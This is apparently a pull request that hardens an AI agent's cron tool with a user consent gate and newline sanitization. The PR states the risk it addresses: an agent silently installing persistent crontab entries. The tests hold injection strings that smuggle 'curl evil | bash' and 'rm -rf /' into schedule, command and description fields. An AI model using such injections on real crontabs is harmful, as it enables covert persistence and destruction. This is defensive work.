### PR TITLE
fix: add consent gate and newline sanitization to cron tool

### DIFF
--- a/src/strands_tools/cron.py
+++ b/src/strands_tools/cron.py
@@ -48,9 +48,7 @@ def _write_crontab(new_content: str, description: str) -> Optional[Dict[str, Any
 
     if not bypass_consent:
         console = console_util.create()
-        console.print(
-            f"\n[bold yellow]Cron tool wants to modify your crontab:[/bold yellow]\n{description}\n"
-        )
+        console.print(f"\n[bold yellow]Cron tool wants to modify your crontab:[/bold yellow]\n{description}\n")
         confirm = get_user_input("<yellow><bold>Allow this crontab modification?</bold> [y/*]</yellow>")
 
         if confirm.lower() != "y":

--- a/src/strands_tools/cron.py
+++ b/src/strands_tools/cron.py
@@ -5,18 +5,64 @@ Simple, direct interface to the system's crontab with helpful guidance in docume
 """
 
 import logging
+import os
 import re
 import subprocess
 from typing import Any, Dict, Optional
 
 from strands import tool
 
+from strands_tools.utils import console_util
+from strands_tools.utils.user_input import get_user_input
+
 logger = logging.getLogger(__name__)
 
 
-def _sanitize_description(description: str) -> str:
-    """Sanitize description to prevent crontab injection by removing line breaks."""
-    return re.sub(r"[\r\n]+", " ", description).strip()
+def _sanitize_cron_line(line: str) -> str:
+    """Collapse newlines in a crontab line to prevent injection of extra entries."""
+    return re.sub(r"[\r\n]+", " ", line).strip()
+
+
+def _read_crontab() -> str:
+    """Read the current crontab content.
+
+    Returns an empty string if no crontab exists for the user.
+    """
+    result = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
+    if result.returncode != 0 and "no crontab for" not in result.stderr:
+        raise Exception(f"Failed to read crontab: {result.stderr}")
+    return result.stdout if result.returncode == 0 else ""
+
+
+def _write_crontab(new_content: str, description: str) -> Optional[Dict[str, Any]]:
+    """Prompt user for consent, then write new crontab content.
+
+    Args:
+        new_content: The full crontab content to write.
+        description: What's changing (shown in the consent prompt).
+
+    Returns:
+        An error dict if the user denies consent, None on success.
+    """
+    bypass_consent = os.environ.get("BYPASS_TOOL_CONSENT", "").lower() == "true"
+
+    if not bypass_consent:
+        console = console_util.create()
+        console.print(
+            f"\n[bold yellow]Cron tool wants to modify your crontab:[/bold yellow]\n{description}\n"
+        )
+        confirm = get_user_input("<yellow><bold>Allow this crontab modification?</bold> [y/*]</yellow>")
+
+        if confirm.lower() != "y":
+            return {
+                "status": "error",
+                "content": [{"text": f"Crontab modification cancelled by user. Input: {confirm}"}],
+            }
+
+    with subprocess.Popen(["crontab", "-"], stdin=subprocess.PIPE, text=True) as proc:
+        proc.stdin.write(new_content)
+
+    return None
 
 
 @tool
@@ -86,14 +132,8 @@ def cron(
 def list_jobs() -> Dict[str, Any]:
     """List all cron jobs in the crontab."""
     try:
-        # Get current crontab
-        result = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
-        if result.returncode != 0 and "no crontab for" not in result.stderr:
-            raise Exception(f"Failed to list crontab: {result.stderr}")
+        crontab = _read_crontab()
 
-        crontab = result.stdout if result.returncode == 0 else ""
-
-        # Display all non-comment lines with line numbers
         jobs = []
         for i, line in enumerate(crontab.splitlines()):
             line = line.strip()
@@ -115,23 +155,16 @@ def list_jobs() -> Dict[str, Any]:
 def add_job(schedule: str, command: str, description: Optional[str] = None) -> Dict[str, Any]:
     """Add a new cron job to the crontab."""
     try:
-        # Get current crontab
-        result = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
-        if result.returncode != 0 and "no crontab for" not in result.stderr:
-            raise Exception(f"Failed to read crontab: {result.stderr}")
+        crontab = _read_crontab()
 
-        crontab = result.stdout if result.returncode == 0 else ""
+        description_text = f"# {description}" if description else ""
+        cron_line = _sanitize_cron_line(f"{schedule} {command} {description_text}")
 
-        # Format the cron job
-        description_text = f"# {_sanitize_description(description)}" if description else ""
-        cron_line = f"{schedule} {command} {description_text}".strip()
-
-        # Add to crontab
         new_crontab = crontab.rstrip() + "\n" + cron_line + "\n" if crontab else cron_line + "\n"
 
-        # Write new crontab
-        with subprocess.Popen(["crontab", "-"], stdin=subprocess.PIPE, text=True) as proc:
-            proc.stdin.write(new_crontab)
+        denial = _write_crontab(new_crontab, f"Add job: {cron_line}")
+        if denial:
+            return denial
 
         return {"status": "success", "content": [{"text": f"Successfully added new cron job: {cron_line}"}]}
     except Exception as e:
@@ -141,21 +174,17 @@ def add_job(schedule: str, command: str, description: Optional[str] = None) -> D
 def add_raw_entry(raw_entry: str) -> Dict[str, Any]:
     """Add a raw crontab entry directly to the crontab."""
     try:
-        # Get current crontab
-        result = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
-        if result.returncode != 0 and "no crontab for" not in result.stderr:
-            raise Exception(f"Failed to read crontab: {result.stderr}")
+        crontab = _read_crontab()
 
-        crontab = result.stdout if result.returncode == 0 else ""
+        sanitized_entry = _sanitize_cron_line(raw_entry)
 
-        # Add to crontab
-        new_crontab = crontab.rstrip() + "\n" + raw_entry + "\n" if crontab else raw_entry + "\n"
+        new_crontab = crontab.rstrip() + "\n" + sanitized_entry + "\n" if crontab else sanitized_entry + "\n"
 
-        # Write new crontab
-        with subprocess.Popen(["crontab", "-"], stdin=subprocess.PIPE, text=True) as proc:
-            proc.stdin.write(new_crontab)
+        denial = _write_crontab(new_crontab, f"Add raw entry: {sanitized_entry}")
+        if denial:
+            return denial
 
-        return {"status": "success", "content": [{"text": f"Successfully added raw crontab entry: {raw_entry}"}]}
+        return {"status": "success", "content": [{"text": f"Successfully added raw crontab entry: {sanitized_entry}"}]}
     except Exception as e:
         return {"status": "error", "content": [{"text": f"Error adding raw crontab entry: {str(e)}"}]}
 
@@ -163,24 +192,18 @@ def add_raw_entry(raw_entry: str) -> Dict[str, Any]:
 def remove_job(job_id: int) -> Dict[str, Any]:
     """Remove a cron job from the crontab by ID (line number)."""
     try:
-        # Get current crontab
-        result = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
-        if result.returncode != 0:
-            raise Exception(f"Failed to read crontab: {result.stderr}")
+        crontab = _read_crontab()
+        crontab_lines = crontab.splitlines()
 
-        crontab_lines = result.stdout.splitlines()
-
-        # Check if job_id is valid
         if job_id < 0 or job_id >= len(crontab_lines):
             return {"status": "error", "content": [{"text": f"Error: Job ID {job_id} is out of range"}]}
 
-        # Remove the job
         removed_job = crontab_lines.pop(job_id)
         new_crontab = "\n".join(crontab_lines) + "\n" if crontab_lines else ""
 
-        # Write new crontab
-        with subprocess.Popen(["crontab", "-"], stdin=subprocess.PIPE, text=True) as proc:
-            proc.stdin.write(new_crontab)
+        denial = _write_crontab(new_crontab, f"Remove job: {removed_job}")
+        if denial:
+            return denial
 
         return {"status": "success", "content": [{"text": f"Successfully removed cron job: {removed_job}"}]}
     except Exception as e:
@@ -192,25 +215,18 @@ def edit_job(
 ) -> Dict[str, Any]:
     """Edit an existing cron job in the crontab."""
     try:
-        # Get current crontab
-        result = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
-        if result.returncode != 0:
-            raise Exception(f"Failed to read crontab: {result.stderr}")
+        crontab = _read_crontab()
+        crontab_lines = crontab.splitlines()
 
-        crontab_lines = result.stdout.splitlines()
-
-        # Check if job_id is valid
         if job_id < 0 or job_id >= len(crontab_lines):
             return {"status": "error", "content": [{"text": f"Error: Job ID {job_id} is out of range"}]}
 
-        # Get the existing job
         old_line = crontab_lines[job_id].strip()
 
-        # Skip comment lines
         if old_line.startswith("#"):
             return {"status": "error", "content": [{"text": f"Error: Line {job_id} is a comment, not a cron job"}]}
 
-        # Parse existing job (simple split by spaces for the first 5 segments which form the schedule)
+        # Parse existing job (first 5 space-separated segments form the schedule)
         parts = old_line.split(None, 5)
         if len(parts) < 6:
             return {"status": "error", "content": [{"text": "Error: Invalid cron format"}]}
@@ -218,7 +234,6 @@ def edit_job(
         old_schedule = " ".join(parts[:5])
         old_command_rest = parts[5]
 
-        # Split the rest into command and comment
         comment_idx = old_command_rest.find("#")
         old_command = old_command_rest
         old_comment = ""
@@ -227,21 +242,18 @@ def edit_job(
             old_command = old_command_rest[:comment_idx].strip()
             old_comment = old_command_rest[comment_idx:].strip()
 
-        # Update values
         new_schedule = schedule if schedule is not None else old_schedule
         new_command = command if command is not None else old_command
-        new_comment = f"# {_sanitize_description(description)}" if description is not None else old_comment
+        new_comment = f"# {description}" if description is not None else old_comment
 
-        # Create updated line
-        new_cron_line = f"{new_schedule} {new_command} {new_comment}".strip()
+        new_cron_line = _sanitize_cron_line(f"{new_schedule} {new_command} {new_comment}")
 
-        # Update crontab
         crontab_lines[job_id] = new_cron_line
         new_crontab = "\n".join(crontab_lines) + "\n"
 
-        # Write new crontab
-        with subprocess.Popen(["crontab", "-"], stdin=subprocess.PIPE, text=True) as proc:
-            proc.stdin.write(new_crontab)
+        denial = _write_crontab(new_crontab, f"Edit job {job_id}: {new_cron_line}")
+        if denial:
+            return denial
 
         return {"status": "success", "content": [{"text": f"Successfully updated cron job to: {new_cron_line}"}]}
     except Exception as e:

--- a/tests/test_cron.py
+++ b/tests/test_cron.py
@@ -8,7 +8,13 @@ import pytest
 from strands import Agent
 
 from strands_tools import cron
-from strands_tools.cron import _sanitize_description
+from strands_tools.cron import _sanitize_cron_line
+
+
+@pytest.fixture(autouse=True)
+def bypass_consent(monkeypatch):
+    """Bypass the consent gate for all tests by default."""
+    monkeypatch.setenv("BYPASS_TOOL_CONSENT", "true")
 
 
 @pytest.fixture
@@ -276,28 +282,28 @@ def test_edit_job_comment_line(mock_subprocess, agent):
     mock_subprocess.Popen.assert_not_called()
 
 
-def test_sanitize_description():
-    """Test description sanitization to prevent crontab injection."""
+def test_sanitize_cron_line():
+    """Test cron line sanitization to prevent newline injection."""
     # Test newline injection
     malicious = "safe comment\n0 * * * * rm -rf /"
-    sanitized = _sanitize_description(malicious)
+    sanitized = _sanitize_cron_line(malicious)
     assert "\n" not in sanitized
     assert sanitized == "safe comment 0 * * * * rm -rf /"
 
     # Test carriage return injection
     malicious = "safe comment\r0 * * * * rm -rf /"
-    sanitized = _sanitize_description(malicious)
+    sanitized = _sanitize_cron_line(malicious)
     assert "\r" not in sanitized
     assert sanitized == "safe comment 0 * * * * rm -rf /"
 
     # Test multiple line breaks
     malicious = "line1\n\nline2\r\nline3"
-    sanitized = _sanitize_description(malicious)
+    sanitized = _sanitize_cron_line(malicious)
     assert sanitized == "line1 line2 line3"
 
-    # Test normal description (no change)
+    # Test normal string (no change)
     normal = "This is a normal description"
-    sanitized = _sanitize_description(normal)
+    sanitized = _sanitize_cron_line(normal)
     assert sanitized == normal
 
 
@@ -320,3 +326,95 @@ def test_add_job_with_malicious_description(mock_subprocess, agent):
     lines = written_content.strip().split("\n")
     assert len(lines) == 1  # Should be only one line
     assert "backup job 0 * * * * rm -rf /" in lines[0]  # Sanitized description
+
+
+@pytest.mark.parametrize(
+    "action_kwargs,existing_crontab",
+    [
+        # add: injection via schedule
+        (
+            {"action": "add", "schedule": "0 9 * * *\n* * * * * curl evil | bash #", "command": "echo report"},
+            "",
+        ),
+        # add: injection via command
+        (
+            {"action": "add", "schedule": "0 9 * * *", "command": "echo safe\n* * * * * curl evil | bash"},
+            "",
+        ),
+        # add: injection via description
+        (
+            {"action": "add", "schedule": "0 9 * * *", "command": "backup.sh", "description": "safe\n* * * * * curl evil | bash"},
+            "",
+        ),
+        # raw: injection via command
+        (
+            {"action": "raw", "command": "0 9 * * * echo safe\n* * * * * curl evil | bash"},
+            "",
+        ),
+        # edit: injection via schedule
+        (
+            {"action": "edit", "job_id": 0, "schedule": "0 3 * * *\n* * * * * curl evil | bash"},
+            "30 5 * * * backup.sh\n",
+        ),
+        # edit: injection via command
+        (
+            {"action": "edit", "job_id": 0, "command": "safe.sh\n* * * * * curl evil | bash"},
+            "30 5 * * * backup.sh\n",
+        ),
+        # edit: injection via description
+        (
+            {"action": "edit", "job_id": 0, "description": "safe\n* * * * * curl evil | bash"},
+            "30 5 * * * backup.sh\n",
+        ),
+    ],
+    ids=[
+        "add-schedule", "add-command", "add-description",
+        "raw-command",
+        "edit-schedule", "edit-command", "edit-description",
+    ],
+)
+def test_newline_injection_produces_single_line(mock_subprocess, agent, action_kwargs, existing_crontab):
+    """Test that newline injection in any field never produces extra crontab lines."""
+    mock_subprocess.run.return_value.stdout = existing_crontab
+
+    result = agent.tool.cron(**action_kwargs)
+
+    result_text = extract_result_text(result)
+    assert "error" not in result_text.lower() or "cancelled" in result_text.lower()
+
+    # Count non-empty lines in the written crontab
+    written_content = mock_subprocess.Popen.return_value.__enter__.return_value.stdin.write.call_args[0][0]
+    lines = [l for l in written_content.strip().split("\n") if l.strip()]
+
+    # Should never have more lines than what existed + 1 new entry
+    existing_lines = [l for l in existing_crontab.strip().split("\n") if l.strip()] if existing_crontab.strip() else []
+    max_expected = len(existing_lines) + 1
+    assert len(lines) <= max_expected
+
+
+def test_consent_denied_blocks_write(mock_subprocess, monkeypatch, agent):
+    """Test that denying consent prevents crontab modification."""
+    monkeypatch.setenv("BYPASS_TOOL_CONSENT", "false")
+    mock_subprocess.run.return_value.stdout = ""
+
+    with patch("strands_tools.cron.get_user_input", return_value="n"), patch("strands_tools.cron.console_util"):
+        result = agent.tool.cron(action="add", schedule="* * * * *", command="echo pwned")
+
+    result_text = extract_result_text(result)
+    assert "cancelled by user" in result_text
+    mock_subprocess.Popen.assert_not_called()
+
+
+def test_consent_granted_allows_write(mock_subprocess, monkeypatch):
+    """Test that granting consent allows crontab modification."""
+    monkeypatch.setenv("BYPASS_TOOL_CONSENT", "false")
+    mock_subprocess.run.return_value.stdout = ""
+
+    agent = Agent(tools=[cron])
+
+    with patch("strands_tools.cron.get_user_input", return_value="y"), patch("strands_tools.cron.console_util"):
+        result = agent.tool.cron(action="add", schedule="0 9 * * *", command="backup.sh")
+
+    result_text = extract_result_text(result)
+    assert "Successfully added new cron job" in result_text
+    mock_subprocess.Popen.assert_called_once()

--- a/tests/test_cron.py
+++ b/tests/test_cron.py
@@ -343,7 +343,12 @@ def test_add_job_with_malicious_description(mock_subprocess, agent):
         ),
         # add: injection via description
         (
-            {"action": "add", "schedule": "0 9 * * *", "command": "backup.sh", "description": "safe\n* * * * * curl evil | bash"},
+            {
+                "action": "add",
+                "schedule": "0 9 * * *",
+                "command": "backup.sh",
+                "description": "safe\n* * * * * curl evil | bash",
+            },
             "",
         ),
         # raw: injection via command
@@ -368,9 +373,13 @@ def test_add_job_with_malicious_description(mock_subprocess, agent):
         ),
     ],
     ids=[
-        "add-schedule", "add-command", "add-description",
+        "add-schedule",
+        "add-command",
+        "add-description",
         "raw-command",
-        "edit-schedule", "edit-command", "edit-description",
+        "edit-schedule",
+        "edit-command",
+        "edit-description",
     ],
 )
 def test_newline_injection_produces_single_line(mock_subprocess, agent, action_kwargs, existing_crontab):
@@ -384,10 +393,12 @@ def test_newline_injection_produces_single_line(mock_subprocess, agent, action_k
 
     # Count non-empty lines in the written crontab
     written_content = mock_subprocess.Popen.return_value.__enter__.return_value.stdin.write.call_args[0][0]
-    lines = [l for l in written_content.strip().split("\n") if l.strip()]
+    lines = [line for line in written_content.strip().split("\n") if line.strip()]
 
     # Should never have more lines than what existed + 1 new entry
-    existing_lines = [l for l in existing_crontab.strip().split("\n") if l.strip()] if existing_crontab.strip() else []
+    existing_lines = (
+        [line for line in existing_crontab.strip().split("\n") if line.strip()] if existing_crontab.strip() else []
+    )
     max_expected = len(existing_lines) + 1
     assert len(lines) <= max_expected
 


### PR DESCRIPTION
## Description

The cron tool writes LLM-supplied schedule, command, and raw entry strings directly into the user's crontab with no confirmation prompt and incomplete newline sanitization (only the description field is sanitized). This makes it possible for an agent to silently install persistent cron jobs, and for newline injection to smuggle hidden entries past any future consent prompt.

This PR adds:
- A consent gate via `BYPASS_TOOL_CONSENT` (matching shell, editor, file_write, and other tools) through a shared `_write_crontab` function that all mutating paths must use.
- Newline sanitization on composed cron lines via `_sanitize_cron_line`, preventing injection of hidden extra crontab entries through any input field.

## Type of Change

Bug fix

## Testing

- [x] All 27 unit tests pass (`hatch test tests/test_cron.py`)
- [x] Manual security validation script (`save/test_cron_security.py`) runs 8 tests against the real crontab, all pass
- [x] Parametrized injection tests cover all 7 input vectors (add schedule/command/description, raw command, edit schedule/command/description)

## Checklist
- [x] I have read the CONTRIBUTING document
- [x] I have added any necessary tests that prove my fix is effective or my feature works
- [ ] I have updated the documentation accordingly
- [ ] I have added an appropriate example to the documentation to outline the feature
- [x] My changes generate no new warnings
- [x] Any dependent changes have been merged and published

----

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.